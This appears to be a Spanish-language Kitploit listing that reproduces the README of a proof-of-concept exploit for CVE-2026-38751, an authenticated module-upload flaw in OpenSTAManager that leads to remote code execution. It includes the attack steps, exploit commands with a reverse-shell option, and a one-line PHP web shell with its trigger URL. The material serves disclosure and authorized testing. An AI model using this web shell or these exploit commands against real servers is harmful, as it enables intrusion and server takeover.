Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2026-38751, que afecta a OpenSTAManager ≤ 2.10. La vulnerabilidad permite que un atacante autenticado cargue un módulo malicioso a través de la funcionalidad de actualización de módulos, lo que lleva a una carga arbitraria de archivos y ejecución remota de código (RCE).

Compartir

CVE-2026-38751 – Carga Arbitraria de Archivos en OpenSTAManager (PoC)

Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2026-38751, que afecta a OpenSTAManager ≤ 2.10. La vulnerabilidad permite a un atacante autenticado cargar un módulo malicioso a través de la funcionalidad de actualización de módulos, lo que conduce a la carga arbitraria de archivos y a la ejecución remota de código (RCE).

Referencia CVE

  • Entrada MITRE CVE (primer registro de divulgación): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Base de datos de vulnerabilidades NVD (NIST): https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • Base de datos de avisos de GitHub https://github.com/advisories/GHSA-rm34-fg4m-39mw

Software Afectado

  • OpenSTAManager ≤ 2.10
  • Sistema de actualización de módulos (modules/aggiornamenti/upload_modules.php)

Descripción de la Vulnerabilidad

La funcionalidad de actualización de módulos permite a los usuarios autenticados cargar módulos basados en ZIP sin una validación adecuada del contenido de los archivos ni de los límites de ejecución. Un atacante puede crear un módulo malicioso que contenga cargas útiles de PHP, las cuales se despliegan en la raíz web y se ejecutan a través del contexto de la aplicación. Esto resulta en:

  • Carga arbitraria de archivos (CWE-434)
  • Ejecución remota de código a través de archivos PHP cargados
  • Compromiso total del contexto de la aplicación

Flujo de Ataque (Alto Nivel)

  1. Autenticarse en OpenSTAManager
  2. Cargar un archivo ZIP de módulo manipulado
  3. Activar el proceso de instalación/actualización del módulo
  4. Acceder a la carga útil PHP cargada a través de la raíz web
  5. Ejecutar comandos arbitrarios en el servidor

##Impacto La explotación exitosa permite:

  • Ejecución remota de comandos
  • Compromiso del servidor web
  • Exfiltración de datos
  • Toma de control total de la aplicación según los privilegios

Requisitos

  • Cuenta de usuario autenticada válida
  • Acceso a la funcionalidad de actualización de módulos habilitada

Uso (PoC)

  1. Generar módulo malicioso
root@kitploit:~
python exploit.py --build

Crea:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. Ejecutar exploit
root@kitploit:~
python exploit.py <username> <password> <target_url>

Modo de shell inversa opcional:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

Ejemplo de carga útil

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

Verificación

Si es exitoso, el siguiente endpoint ejecuta comandos del sistema: /modules/run/evil.php?cmd=id

Referencias MITRE / NVD

  • Registro MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Descargo de responsabilidad

Este proyecto está destinado a:

  • Fines educativos
  • Pruebas de seguridad autorizadas
  • Entornos de investigación

No lo utilice contra sistemas sin permiso explícito.

Notas

La detección puede variar según la configuración del servidor. Algunos despliegues pueden deshabilitar la ejecución directa de PHP en los directorios de módulos. El momento de activación del módulo puede requerir reintentos.

Agradecimientos

  • Programa MITRE CVE
  • Base de Datos Nacional de Vulnerabilidades (NVD) de NIST
  • Mantenedores del proyecto OpenSTAManager
  • https://github.com/fuutianyii/poc (Primer PoC)
Descargar herramienta